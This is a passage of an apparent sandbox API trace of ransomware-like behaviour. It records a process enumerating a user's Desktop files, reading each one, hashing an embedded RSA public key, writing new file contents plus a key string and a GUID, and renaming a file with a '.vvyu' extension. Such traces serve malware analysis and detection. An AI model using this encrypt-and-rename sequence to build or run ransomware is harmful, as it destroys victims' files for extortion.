hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fa08 | out: hHeap=0x620000) returned 1 [0200.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.519] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xe540, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xe540, lpOverlapped=0x0) returned 1 [0200.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.521] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xe545, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.521] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.522] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.523] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.523] CloseHandle (hObject=0x510) returned 1 [0200.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0200.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0200.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0200.525] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\9zmN.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\9zmn.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\9zmN.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\9zmn.mp3.vvyu")) returned 1 [0200.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.526] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.530] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ce6560, ftCreationTime.dwHighDateTime=0x1d896f8, ftLastAccessTime.dwLowDateTime=0x89413c00, ftLastAccessTime.dwHighDateTime=0x1d89719, ftLastWriteTime.dwLowDateTime=0x89413c00, ftLastWriteTime.dwHighDateTime=0x1d89719, nFileSizeHigh=0x0, nFileSizeLow=0xd6c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GHPRnGA3a e4cbOQmL8U.bmp", cAlternateFileName="GHPRNG~1.BMP")) returned 1 [0200.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.530] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GHPRnGA3a e4cbOQmL8U.bmp") returned=".bmp" [0200.530] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\GHPRnGA3a e4cbOQmL8U.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\ghprnga3a e4cboqml8u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.531] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=54976) returned 1 [0200.531] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.533] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xd69a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.534] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.536] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.536] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd6c0, lpOverlapped=0x0) returned 1 [0200.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.537] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.539] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.539] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.539] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.539] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.539] GetLastError () returned 0x0 [0200.539] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.539] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.540] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.540] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.540] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6c0) returned 0x2ea99b0 [0200.540] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa08 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fa50 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.541] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0200.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3350 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.545] GetCurrentThreadId () returned 0x66c [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8118 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.546] GetCurrentThreadId () returned 0x66c [0200.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33c8 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33e0 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.550] 